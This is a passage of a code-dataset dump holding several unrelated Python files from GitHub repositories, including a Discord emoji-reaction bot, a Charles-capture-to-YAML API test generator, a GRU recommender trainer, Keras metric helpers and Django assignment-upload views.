server\"\"\"\n print(f'{self.user} has connected to Discord')\n\n async def on_message(self, message: discord.Message) -> None:\n \"\"\"React with the 🔥 emoji on all of Naums messages\"\"\"\n if message.author.name == \"Naum.Raskind\":\n await message.add_reaction(\"🔥\")\n\n def run(self) -> None:\n \"\"\"Start the bot and begin listening for messages\"\"\"\n super().run(self.token)\n\n def get_token(self) -> str:\n \"\"\"Retrieve the bot token from the .env file\n\n The bot token can not be viewed after it is generated. If the bot token is lost then you will need\n to go to https://discord.com/developers/applications/1079108221018574958/bot and regenerate it.\n \"\"\"\n load_dotenv()\n return os.getenv('DISCORD_TOKEN')\n\n\ndef main():\n \"\"\"Create famjammer and begin listening to messages\"\"\"\n famjammer = FamJamClient()\n famjammer.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nraskind/famjam-discord-bot","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74479705473","text":"# -*- encoding: utf-8 -*-\n# @Version : 1.0 \n# @Time : 2018/5/29 15:00\n# @Author : wanghuodong \n# @note : \n\nfrom sklearn.preprocessing import MaxAbsScaler\n\nX = [\n [1,5,1,2,10],\n [2,6,3,2,7],\n [3,7,5,6,4],\n [4,8,7,8,1]\n]\nprint(\"before transform: \" ,X)\n\nscaler = MaxAbsScaler()\nscaler.fit(X)\nprint(\"scale_is: \",scaler.scale_)\nprint(\"max_abs_is: \",scaler.max_abs_)\nprint(\"n_samples_seen_is: \",scaler.n_samples_seen_)\n\nprint(\"after transform : \",scaler.transform(X))","repo_name":"firewang/python_practice_2018","sub_path":"11.DataPreprocessing.preprocessing/code/MaxAbsScaler_model.py","file_name":"MaxAbsScaler_model.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26336823257","text":"\nclass AthleteList(list):\n def __init__(self, a_name, a_dob=None, a_times=[]):\n list.__init__([])\n self.name = a_name\n self.DOB= a_dob\n self.extend(a_times)\n\n def top3(self):\n return (sorted(set([sanitize(t) for t in self]))[0:3])\n#\n# def txt(textFile):\n# try:\n# with open(textFile) as file:\n# data = file.readline()\n# temp = data.strip().split(\",\")\n# return (AthleteList(temp.pop(0),temp.pop(0),temp)) # matches with the 3 arguments above us at athelte , name , dob, times\n# except IOError as err:\n# print(\"File Error:\" + str(err))\n\ndef sanitize(time_string):\n if \"-\" in time_string:\n splitter = \"-\"\n elif \":\" in time_string:\n splitter = \":\"\n else:\n return (time_string)\n (mins, secs) = time_string.split(splitter)\n return (mins+\".\"+secs)\n\n# sarah = txt(\"sarah2.txt\")\n# julie = txt(\"julie2.txt\")\n# james = txt(\"james2.txt\")\n# mikey = txt(\"mikey2.txt\")\n#\n#\n# print(james.name+ \" fastest times are: \" + str(james.top3()))\n# print(sarah.name + \" fastest times are : \"+ str(sarah.top3()))\n# print(julie.name+ \" fastest times are: \" + str(julie.top3()))\n# print(mikey.name + \" fastest times are : \"+ str(mikey.top3()))","repo_name":"ValorWind1/Notes_Dan_book_headfirst","sub_path":"athlete_List.py","file_name":"athlete_List.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6406618510","text":"# -*- coding:utf-8 -*-\n# @Time : 2020/10/15\n# @Author : Leo Zhang\n# @File : writeCaseYaml.py\n# ****************************\nimport os\nimport json\nimport logging\nimport urllib.parse\nfrom comm.utils.readYaml import write_yaml_file, read_yaml_data\nfrom comm.utils.readJson import write_json_file\nfrom config import API_CONFIG, PROJECT_NAME\n\n\ndef write_case_yaml(har_path):\n \"\"\"循环读取接口数据文件\n\n :param har_path: Charles导出文件路径\n :return:\n \"\"\"\n case_file_list = list()\n logging.info(\"读取抓包文件主目录: {}\".format(har_path))\n har_list = os.listdir(har_path)\n for each in har_list:\n ext_name = os.path.splitext(each)[1]\n if ext_name == '.chlsj':\n\n logging.info(\"读取抓包文件: {}\".format(each))\n file_path = har_path+'/'+each\n with open(file_path, 'r', encoding='utf-8') as f:\n har_cts = json.loads(f.read())\n har_ct = har_cts[0]\n\n # 获取接口基本信息\n host = har_ct[\"host\"]\n port = har_ct[\"port\"]\n method = har_ct[\"method\"]\n path = har_ct[\"path\"]\n headers = har_ct[\"request\"][\"header\"]['headers']\n title = path.split(\"/\")[-1].replace('-', '')\n module = path.split(\"/\")[-2].replace('-', '')\n\n # 创建模块目录\n module_path = har_path.split('data')[0] + '/page/' + module\n try:\n os.makedirs(module_path)\n except:\n pass\n\n # 定义api通过配置\n api_config = dict()\n simp_header = dict()\n for header in headers:\n # 去除基础请求头\n base_header = ['Host',\n 'Content-Length',\n 'User-Agent',\n 'Origin',\n 'Referer',\n 'Connection',\n 'Accept',\n 'Accept-Encoding',\n 'Accept-Language']\n if header['name'] not in base_header:\n simp_header[header['name']] = header['value']\n api_config['host'] = host+':'+str(port)\n # 判断是否存在自定义消息头\n if simp_header:\n api_config['headers'] = simp_header\n else:\n api_config['headers'] = None\n api_config['cookies'] = None\n # 检查是否已存在项目配置信息,没有则写入\n rconfig = read_yaml_data(API_CONFIG)\n if rconfig:\n if PROJECT_NAME not in rconfig:\n rconfig[PROJECT_NAME] = api_config\n write_yaml_file(API_CONFIG, rconfig)\n else:\n nconfig = dict()\n nconfig[PROJECT_NAME] = api_config\n write_yaml_file(API_CONFIG, nconfig)\n\n # 定义测试信息\n test_info = dict()\n test_info[\"title\"] = module\n test_info[\"host\"] = '${host}'\n test_info[\"scheme\"] = har_ct[\"scheme\"]\n test_info[\"method\"] = method\n test_info[\"address\"] = path\n test_info[\"mime_type\"] = har_ct[\"request\"][\"mimeType\"]\n test_info[\"headers\"] = '${headers}'\n test_info[\"timeout\"] = 10\n test_info[\"file\"] = False\n test_info[\"cookies\"] = False\n test_info[\"premise\"] = False\n\n # 解析请求报文\n parameter = dict()\n try:\n if method in 'POST':\n parameter_list = urllib.parse.unquote(har_ct[\"request\"][\"body\"][\"text\"])\n elif method in 'PUT':\n parameter_list = har_ct[\"request\"][\"body\"][\"text\"]\n elif method in 'DELETE':\n parameter_list = urllib.parse.unquote(har_ct[\"request\"][\"body\"][\"text\"])\n else:\n parameter_list = har_ct[\"query\"]\n\n if \"&\" in parameter_list:\n for key in parameter_list.split(\"&\"):\n val = key.split(\"=\")\n parameter[val[0]] = val[1]\n else:\n parameter = json.loads(parameter_list)\n except Exception as e:\n logging.error(\"未找到parameter: %s\" % e)\n raise e\n\n # 定义用例信息\n test_case_list = list()\n test_case = dict()\n test_case[\"summary\"] = title\n test_case[\"describe\"] = 'test_'+title\n\n # 定义请求入参信息,且当参数字符总长度大于200时单独写入json文件\n if len(str(parameter)) > 200:\n param_name = title+'_request.json'\n if param_name not in os.listdir(module_path):\n # 定义请求json\n param_dict = dict()\n param_dict[\"summary\"] = title\n param_dict[\"body\"] = parameter\n param_file = module_path+'/'+param_name\n logging.info(\"生成请求文件: {}\".format(param_file))\n write_json_file(param_file, [param_dict])\n test_case[\"parameter\"] = param_name\n else:\n test_case[\"parameter\"] = parameter\n\n # 定义请求返回信息\n response_code = har_ct[\"response\"][\"status\"]\n response_body = har_ct[\"response\"][\"body\"][\"text\"]\n check = dict()\n check[\"check_type\"] = 'check_json'\n check[\"expected_code\"] = response_code\n expected_request = json.loads(response_body)\n\n # 当返回参数字符总长度大于200时单独写入json文件\n if len(str(expected_request)) > 200:\n result_name = title+'_response.json'\n if result_name not in os.listdir(module_path):\n # 定义响应json\n result_dict = dict()\n result_dict[\"summary\"] = title\n result_dict[\"body\"] = expected_request\n result_file = module_path + '/' + result_name\n logging.info(\"生成响应文件: {}\".format(result_file))\n write_json_file(result_file, [result_dict])\n check[\"expected_result\"] = result_name\n else:\n check[\"expected_result\"] = expected_request\n test_case[\"check_body\"] = check\n test_case_list.append(test_case)\n\n # 合并测试信息、用例信息\n case_list = dict()\n case_list[\"test_info\"] = test_info\n case_list[\"test_case\"] = test_case_list\n\n # 写入测试用例(存在则忽略)\n case_name = 'test_'+title+'.yaml'\n case_file = module_path+'/'+case_name\n if not os.path.exists(case_file):\n logging.info(\"生成用例文件: {}\".format(case_file))\n write_yaml_file(case_file, case_list)\n\n case_file_list.append(case_file)\n return case_file_list\n\n\nif __name__ == '__main__':\n real_path = os.path.dirname(os.path.realpath(__file__)).replace('\\\\', '/')\n print('测试用例列表: ', write_case_yaml(real_path+'/data'))\n","repo_name":"gaozhen1992/ApiTesting","sub_path":"comm/script/writeCaseYml.py","file_name":"writeCaseYml.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"23936353338","text":"import numpy as np\nimport keras\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.text import one_hot\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import GRU, Dense, Activation, InputLayer, Bidirectional, LSTM\nfrom keras.callbacks import ModelCheckpoint\nfrom gensim.models import Word2Vec, KeyedVectors\nimport matplotlib.pyplot as plt\n\nproduct_id = []\nsession_max_length = 12\nvocab = {}\n\n\n\ndef load_data(data_path):\n f = open(data_path, mode='r', encoding='utf-8')\n wv_model = KeyedVectors.load_word2vec_format('wv.model', binary=False)\n product_id.extend(wv_model.index2word)\n dict_size = len(product_id)\n X_sequence_product = []\n Y_target_product = []\n for line in f:\n item_in_session = line.split('\\t')\n x_sequence_product = []\n for i in range(len(item_in_session) - 1):\n item = item_in_session[i].replace('\\n', '')\n vector_item = wv_model.wv[item]\n x_sequence_product.append(vector_item)\n vector_target = product_id.index(item_in_session[len(item_in_session) - 1].replace('\\n', ''))\n X_sequence_product.append(x_sequence_product)\n Y_target_product.append(vector_target)\n X_train = pad_sequences(X_sequence_product, session_max_length, padding='post', dtype='float32')\n Y_train = to_categorical(Y_target_product, num_classes=len(product_id))\n #print(Y_train.shape[1])\n print(len(wv_model.vocab))\n vocab = wv_model.vocab\n return X_train, Y_train\n\ndef top_k_accuracy(y_true, y_pred):\n return keras.metrics.top_k_categorical_accuracy(y_true=y_true, y_pred=y_pred, k=10)\n\ndef train_model(data_path):\n X, Y = load_data(data_path)\n X_train, X_valid, Y_train, Y_valid = train_test_split(X, Y, test_size=0.1)\n\n model = Sequential()\n model.add(InputLayer(input_shape=(12, 100)))\n model.add(Bidirectional(GRU(128, recurrent_dropout=0.35, return_sequences=True)))\n model.add(Bidirectional(GRU(128, recurrent_dropout=0.35, return_sequences=False)))\n model.add(Dense(len(product_id), activation='softmax'))\n model.summary()\n print(product_id)\n board = keras.callbacks.TensorBoard(log_dir='E:\\Logs', histogram_freq=0, batch_size=32, write_graph=True, write_grads=False,\n write_images=False, embeddings_freq=0, embeddings_layer_names=None,\n embeddings_metadata=None, embeddings_data=None)\n model_name = '../rs.h5'\n checkpointer = ModelCheckpoint(filepath=model_name, monitor='val_acc', verbose=1, save_best_only=True)\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy', top_k_accuracy])\n #model.evaluate()\n history = model.fit(X_train, Y_train, validation_data=[X_valid, Y_valid], batch_size=512, epochs=30, callbacks=[checkpointer, board])\n # Plot training & validation accuracy values\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\nif __name__ == '__main__':\n train_model(data_path='../data_sample/new_train_sequence.dvg')\n #load_data()\n","repo_name":"TuanDH94/sessionRecommendation","sub_path":"lstm_model/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13327609219","text":"from collections import Counter\n\n\n# worst case depends on the time complexity of the sort function\n# but this is at least O(n) plus the time complexity of the sorted function\ndef check_pal(word):\n sort = ''.join(sorted(word))\n odd = 0\n count = 0\n for i in range(len(sort)):\n if i != (len(sort) - 1) and sort[i] != sort[i + 1]:\n count += 1\n if count & 1 == 1:\n odd += 1\n count = 0\n elif count == 0:\n odd += 1\n if odd > 1:\n return False\n else:\n count += 1\n return True\n\n\n#for the below use a collections.counter\n\ndef pali(s):\n thing = Counter(s)\n return sum(v % 2 for v in thing.values()) <= 1 \n\n\ns = 'llorcan'\n#print(check_pal(s))\nprint(pali(s))","repo_name":"lorcanj/EPI_practice","sub_path":"chapter12/pali.py","file_name":"pali.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4455782084","text":"import os\r\nimport json\r\nfrom modules.utils.exceptions import ReportNotFound, NoTestData\r\n\r\ndef getCodeCoverageFromJSON(filepath):\r\n\r\n if not os.path.isfile( filepath ):\r\n print( f'##[error] Report not found at {filepath}' )\r\n raise ReportNotFound( filepath )\r\n\r\n with open( filepath, 'rb') as file:\r\n data = json.load( file )\r\n \r\n if( ( not 'result' in data ) or ( not 'coverage' in data[ 'result' ] ) or \r\n ( not 'coverage' in data[ 'result' ]['coverage'] )):\r\n print( f'##[warning] Report does not contain code coverage data' )\r\n raise NoTestData()\r\n \r\n mapTestClasses = dict()\r\n testResultInfo = data[ 'result' ][ 'coverage' ]\r\n if 'coverage' in testResultInfo:\r\n coverageData = testResultInfo[ 'coverage' ]\r\n if isinstance( coverageData, list ):\r\n for codeCoverageItem in coverageData:\r\n getCoverageData( codeCoverageItem, mapTestClasses )\r\n else:\r\n getCoverageData( coverageData, mapTestClasses )\r\n\r\n \"\"\" if 'codeCoverageWarnings' in testResultInfo:\r\n codeCoverageWarning = testResultInfo[ 'codeCoverageWarnings' ]\r\n if isinstance( codeCoverageWarning, list ):\r\n for codeCoverageWarningItem in codeCoverageWarning:\r\n getCoverageWarning( codeCoverageWarningItem, mapTestClasses )\r\n else:\r\n getCoverageWarning( codeCoverageWarning, mapTestClasses ) \"\"\"\r\n\r\n return mapTestClasses\r\n\r\n\r\ndef getCoverageWarning( codeCoverageWarning, mapTestClasses ):\r\n \r\n message = codeCoverageWarning[ 'message' ]\r\n classWarningName = codeCoverageWarning[ 'name' ]\r\n\r\n if classWarningName in mapTestClasses:\r\n mapTestClasses[ classWarningName ][ 'WARNING' ] = message\r\n else:\r\n mapTestClasses[ classWarningName ] = dict()\r\n mapTestClasses[ classWarningName ][ 'WARNING' ] = message\r\n mapTestClasses[ classWarningName ][ 'Number of lines' ] = 'N/A'\r\n mapTestClasses[ classWarningName ][ 'Number of uncovered lines' ] = 'N/A'\r\n\r\n\r\n\r\ndef getCoverageData( codeCoverageItem, mapTestClasses ):\r\n className = codeCoverageItem[ 'name' ]\r\n numLines = codeCoverageItem[ 'totalLines' ] #\r\n numUncoveredLines = int(numLines) - int(codeCoverageItem[ 'totalCovered' ]) #\r\n\r\n if not className in mapTestClasses:\r\n mapTestClasses[ className ] = dict()\r\n\r\n mapTestClasses[ className ][ 'Number of lines' ] = int( numLines )\r\n mapTestClasses[ className ][ 'Number of uncovered lines' ] = int( numUncoveredLines )\r\n\r\n if int( numUncoveredLines ) > 0:\r\n totalLines = codeCoverageItem[ 'lines' ]\r\n uncoveredLines = [line for line in totalLines if totalLines[line] == 0]\r\n mapTestClasses[ className ][ 'Lines not covered' ] = ', '.join( uncoveredLines )\r\n \r\n \r\ndef sortDictionaries(mapCoverage, mapPercent):\r\n # Sort the TestResult Dictionary for better view on report\r\n classList = [k for k, v in sorted(mapPercent.items(), key=lambda item: item[1])]\r\n mapData = dict()\r\n for className in classList:\r\n mapData[ className ] = mapCoverage[className]\r\n mapData[ className ]['Percent'] = mapPercent[className]\r\n return mapData","repo_name":"Kiran-Waghamare/actions-pipelines","sub_path":"codeCoverage/modules/utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3586742622","text":"import math as Maths\nfrom . import meters_privatefunctions as MeterFunctions\n\nclass DefineBlockMeter:\n\n\tdef __init__(self, metertype):\n\n\t\tself.datavalue = 0\n\n\t\tself.metertype = metertype\n\n\t\tself.endangle = 185.0\n\n\t\tself.countermax = 9.5\n\n\t\tif self.metertype == \"Outer\":\n\t\t\tself.circleradius = 49.5\n\t\telse:\n\t\t\tself.circleradius = 36.5\n\n\t\tself.circumference = self.circleradius * Maths.pi * 2.0\n\n\tdef setmetervalue(self, newvalue):\n\n\t\tself.datavalue = newvalue\n\n\n\n\tdef getmeterdata(self):\n\n\t\treturn self.generatemeterdata(self.datavalue)\n\n\n\tdef getdummydata(self):\n\n\t\treturn self.generatemeterdata(0)\n\n\n\tdef generatemeterdata(self, countervalue):\n\n\t\tstartangle = MeterFunctions.getblockmeterangle(countervalue, self.endangle, self.countermax)\n\n\t\tfilledangle = (self.endangle - startangle) / 360.0\n\n\t\toutcome = {}\n\t\toutcome['fill'] = filledangle * self.circumference\n\t\toutcome['gap'] = self.circumference - outcome['fill']\n\t\toutcome['offset'] = ((180.0 - startangle) / 360.0) * self.circumference\n\n\t\treturn outcome\n\n\n\n\n\n","repo_name":"johnpcole/Download-Manager","sub_path":"codebase/manager_component/monitoring_subcomponent/dashboardmeters_subcomponent/meter_subcomponent/blockmeter_class.py","file_name":"blockmeter_class.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13277841529","text":"import os\nimport logging\nimport datetime\nimport ksrates.fc_configfile as fcConf\nimport ksrates.fc_check_input as fcCheck\nimport ksrates.fc_wgd as fc_wgd\nfrom ksrates.utils import init_logging\n\n\ndef wgd_orthologs(config_file, species_one, species_two, n_threads):\n # INPUT\n species_pair = sorted([species_one, species_two], key=str.casefold)\n species1, species2 = species_pair[0], species_pair[1] # sorted!\n\n config = fcConf.Configuration(config_file)\n init_logging(f\"Ortholog wgd analysis for species pair [{species1} - {species2}]\", config.get_logging_level())\n\n # Get parameters and FASTA files from configuration file\n latin_names = config.get_latin_names()\n\n fasta_names_dict = config.get_fasta_dict()\n species1_fasta_file = config.get_fasta_name(fasta_names_dict, species1)\n fcCheck.check_inputfile(species1_fasta_file, \"FASTA file\")\n fcCheck.check_IDs(species1_fasta_file, latin_names[species1])\n\n species2_fasta_file = config.get_fasta_name(fasta_names_dict, species2)\n fcCheck.check_inputfile(species2_fasta_file, \"FASTA file\")\n fcCheck.check_IDs(species2_fasta_file, latin_names[species2])\n\n # Creating folder for output files of wgd ortholog pipeline.\n # Note: since in Nextflow mode there are multiple wgdOrtholog processes running in parallel,\n # this \"if-try-except\" prevents that almost-simultaneous checks rise an error: a slower process \n # would rise an error if in the meanwhile a faster process had already created the folder.\n ortholog_dists_dir = os.path.join(\"ortholog_distributions\", \"\")\n if not os.path.exists(ortholog_dists_dir):\n logging.info(f\"Creating directory {ortholog_dists_dir}\")\n os.makedirs(ortholog_dists_dir, exist_ok=True)\n\n # -----------------------------------------------------------------------------\n\n # ESTIMATING ORTHOLOG Ks VALUES\n logging.info(\"Running wgd ortholog Ks pipeline...\")\n fc_wgd.ks_orthologs(species1, species2, species1_fasta_file, species2_fasta_file, base_dir=ortholog_dists_dir,\n n_threads=n_threads)\n\n logging.info(datetime.datetime.today().ctime())\n logging.info(\"Done\")\n","repo_name":"altingia/ksrates","sub_path":"ksrates/wgd_orthologs.py","file_name":"wgd_orthologs.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"8995299719","text":"from keras.models import model_from_json\nfrom keras.layers import Conv2D, Activation, Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import PReLU\nimport keras.backend as K\n\n\ndef conv2d(previous_layer, filters, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"relu\",\n batch_norm=True, before_activation=True):\n x = Conv2D(filters, kernel_size, strides=strides, padding=padding)(previous_layer)\n if batch_norm is True and before_activation is True:\n x = BatchNormalization()(x)\n if activation == \"prelu\":\n x = PReLU()(x)\n else:\n x = Activation(activation)(x)\n if batch_norm is True and before_activation is False:\n x = BatchNormalization()(x)\n return x\n\n\ndef dense(previous_layer, units, activation=\"relu\", batch_norm=True, before_activation=True):\n x = Dense(units)(previous_layer)\n if batch_norm is True and before_activation is True:\n x = BatchNormalization()(x)\n if activation == \"prelu\":\n x = PReLU()(x)\n else:\n x = Activation(activation)(x)\n if batch_norm is True and before_activation is False:\n x = BatchNormalization()(x)\n return x\n\n\ndef save_model(model, json_filename, weights_filename):\n model_json = model.to_json()\n with open(json_filename, \"w\") as json_file:\n json_file.write(model_json)\n model.save_weights(weights_filename)\n # print(\"Saved model to disk\")\n\n\ndef load_model(json_filename, weights_filename):\n try:\n json_file = open(json_filename, 'r')\n except:\n json_file = None\n if json_file is not None:\n loaded_model_json = json_file.read()\n json_file.close()\n model = model_from_json(loaded_model_json)\n model.load_weights(weights_filename)\n print(\"Loaded model from disk\")\n return model, True\n else:\n return None, False\n\n\ndef precision(y_true, y_pred):\n '''Calculates the precision, a metric for multi-label classification of\n how many selected items are relevant.\n '''\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n\ndef recall(y_true, y_pred):\n '''Calculates the recall, a metric for multi-label classification of\n how many relevant items are selected.\n '''\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n\ndef beta_score(y_true, y_pred):\n '''Calculates the F score, the weighted harmonic mean of precision and recall.\n This is useful for multi-label classification, where input samples can be\n classified as sets of labels. By only using accuracy (precision) a model\n would achieve a perfect score by simply assigning every class to every\n input. In order to avoid this, a metric should penalize incorrect class\n assignments as well (recall). The F-beta score (ranged from 0.0 to 1.0)\n computes this, as a weighted mean of the proportion of correct class\n assignments vs. the proportion of incorrect class assignments.\n With beta = 1, this is equivalent to a F-measure. With beta < 1, assigning\n correct classes becomes more important, and with beta > 1 the metric is\n instead weighted towards penalizing incorrect class assignments.\n '''\n\n treshold = K.constant(0.2)\n greater_mask = K.greater(y_pred, treshold)\n y_pred_final = K.cast(greater_mask, \"float32\")\n\n beta = 2\n if beta < 0:\n raise ValueError('The lowest choosable beta is zero (only precision).')\n\n # If there are no true positives, fix the F score at 0 like sklearn.\n if K.sum(K.round(K.clip(y_true, 0, 1))) == 0:\n return 0\n\n p = precision(y_true, y_pred_final)\n r = recall(y_true, y_pred_final)\n bb = beta ** 2\n # fbeta_score = (1 + bb) * (p * r) / (bb * p + r + K.epsilon())\n fbeta_score = (1 + bb) * (p * r) / (bb * p + r)\n return fbeta_score\n","repo_name":"nyounes/kaggle","sub_path":"amazon/keras_tools.py","file_name":"keras_tools.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"646104556","text":"from aiogram import types\nfrom aiogram.dispatcher.filters.builtin import CommandHelp\n\nfrom loader import dp\n\n\n@dp.message_handler(CommandHelp())\n@dp.message_handler(text='Помощь')\nasync def bot_help(message: types.Message):\n text = (\"Список команд: \",\n \"/start - Вернуться в главное меню\",\n \"/help - Получить справку\",\n \"/menu - Посмотреть меню\",\n \"\",\n \"Если что-то не понятно или \",\n \"есть какие-то вопросы пишите \",\n \"на почту: example@mail.ru\",\n\n )\n \n await message.answer(\"\\n\".join(text))\n","repo_name":"IvanKem/test-restaurant-bot","sub_path":"handlers/users/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8632994445","text":"import aiohttp_jinja2\nimport aiohttp\n\nfrom aiohttp_session import get_session\nimport controllers.controller\nimport views.index_view\nimport models.article.sqlite_dao, models.article.data, models.article.services\n\n\nclass IndexController(controllers.controller.Controller):\n routes = aiohttp.web.RouteTableDef()\n\n @routes.get('/')\n async def index_get(request):\n session = await get_session(request)\n article_services = models.article.services.ArticleServices(request)\n if 'q' in request.rel_url.query:\n search_string = request.rel_url.query['q']\n print('opa: ' + search_string)\n else:\n search_string = ''\n article_list = await article_services.fetch_articles(search_string)\n if 'username' in session:\n username = session['username']\n else:\n username = None\n return await views.index_view.handle(request, {'username': username, 'article_list': article_list})","repo_name":"brmorais92/ufgnews","sub_path":"controllers/index_controller.py","file_name":"index_controller.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23028034425","text":"from django.contrib import messages\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom assignments.forms import AssignmentsForm, StudentUploadForm, Assignments_Boostrap_Form\nfrom data.models import Class, Assignment, Group, StudentUpload, AssignmentRelationship, Relationship, Notification\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\n\n\n# Create your views here.\ndef assignment_main_page(request, class_pk):\n class_instance = Class.objects.filter(class_id=class_pk).first()\n if not class_instance:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/groups/class/\"+str(class_pk))\n if class_instance.instructor_instance != request.user:\n messages.info(request, \"You are not the instructor of this class\")\n return HttpResponseRedirect(\"/groups/class/\" + str(class_pk))\n\n assignments_in_this_class = Assignment.objects.filter(class_instance=class_instance)\n\n if request.method == 'POST':\n form = AssignmentsForm(request.POST, request.FILES)\n print(\"create form\")\n if form.is_valid():\n print(\"form.is_valid()\")\n a = form.save()\n # push notifications to all students in that class\n relations = Relationship.objects.filter(class_instance=class_instance)\n print(relations)\n for r in relations:\n new_notification = Notification(class_instance=class_instance,\n sender_instance=request.user,\n receiver_instance=r.student_instance,\n status=20)\n new_notification.save()\n\n return render(request, 'assignment_main_instructor.html', {\n 'class_ins': class_instance,\n 'assignments': assignments_in_this_class,\n 'form': form,\n })\n else:\n form = AssignmentsForm(initial={'class_instance': class_instance})\n return render(request, 'assignment_main_instructor.html', {\n 'class_ins': class_instance,\n 'assignments': assignments_in_this_class,\n 'form': form,\n })\n\n\ndef show_student_upload(request, a_pk, g_pk):\n assignment_ins = Assignment.objects.filter(assignment_id=a_pk).first()\n if not assignment_ins:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/explore\")\n group_ins = Group.objects.filter(group_id=g_pk).first()\n # for test\n if request.method == 'POST':\n form = StudentUploadForm(request.POST, request.FILES)\n if form.is_valid():\n student_upload = form.save()\n print(student_upload.upload_file)\n\n temp_a_re = AssignmentRelationship.objects.filter(group_instance=group_ins,\n assignment_instance=assignment_ins)\n if not temp_a_re:\n # this group hasn't uploaded file for this assignment\n new_a_re = AssignmentRelationship()\n new_a_re.student_upload_instance = student_upload\n new_a_re.group_instance = group_ins\n new_a_re.assignment_instance = assignment_ins\n new_a_re.save()\n print(new_a_re.upload_time)\n print(new_a_re.student_upload_instance.upload_file)\n\n else:\n # this group has already uploaded a file for this assignment\n exist_a_re = temp_a_re.first()\n old_student_upload = exist_a_re.student_upload_instance\n exist_a_re.student_upload_instance = student_upload\n exist_a_re.save()\n print(exist_a_re.upload_time)\n # delete the old one\n old_student_upload.delete()\n print(exist_a_re.student_upload_instance.upload_file)\n\n # push notifications to all group members\n relations = Relationship.objects.filter(group_id=group_ins.group_id)\n for r in relations:\n if request.user.account_id == r.student_instance.account_id:\n continue\n new_notification = Notification(class_instance=group_ins.class_instance,\n sender_instance=request.user,\n receiver_instance=r.student_instance,\n group_instance=group_ins,\n status=21)\n new_notification.save()\n\n # TODO: new return\n return HttpResponseRedirect(\"/groups/class/\" + str(group_ins.class_instance.class_id))\n else:\n form = StudentUploadForm()\n return render(request, 'student_upload.html', {\n 'assign_ins': assignment_ins,\n 'form': form,\n })\n\n\ndef remove_assignment(request):\n assignment_id = request.POST.get(\"assignment_id\")\n Assignment.objects.filter(assignment_id=assignment_id).delete()\n return JsonResponse({\"data\": \"Successfully deleted assignment\"})\n\n\ndef show_assignment_detail(request, a_pk):\n \"\"\"\n render to a detail page of an assignment, where instructor can see groups with their\n uploaded files\n :param request, a_pk:\n :return:\n \"\"\"\n assignment_ins = Assignment.objects.filter(assignment_id=a_pk).first()\n if not assignment_ins:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/explore\")\n if assignment_ins.class_instance.instructor_instance != request.user:\n messages.info(request, \"You are not the instructor of this class\")\n return HttpResponseRedirect(\"/explore\")\n\n ass_class_instance = assignment_ins.class_instance\n # get groups in this class\n groups = Group.objects.filter(class_instance=ass_class_instance)\n groups_assignment_dict = {}\n for group in groups:\n a_rel = AssignmentRelationship.objects.filter(group_instance=group,\n assignment_instance=assignment_ins).first()\n if not a_rel:\n # this group has no file for this assignment\n groups_assignment_dict[group] = False\n else:\n groups_assignment_dict[group] = a_rel\n\n return render(request, 'assignment_detail_instructor.html', {\n 'assignment_ins': assignment_ins,\n 'groups_rel_dic': groups_assignment_dict\n })\n\n\ndef show_assignment_group(request, group_pk):\n group_instance = Group.objects.filter(group_id=group_pk).first()\n 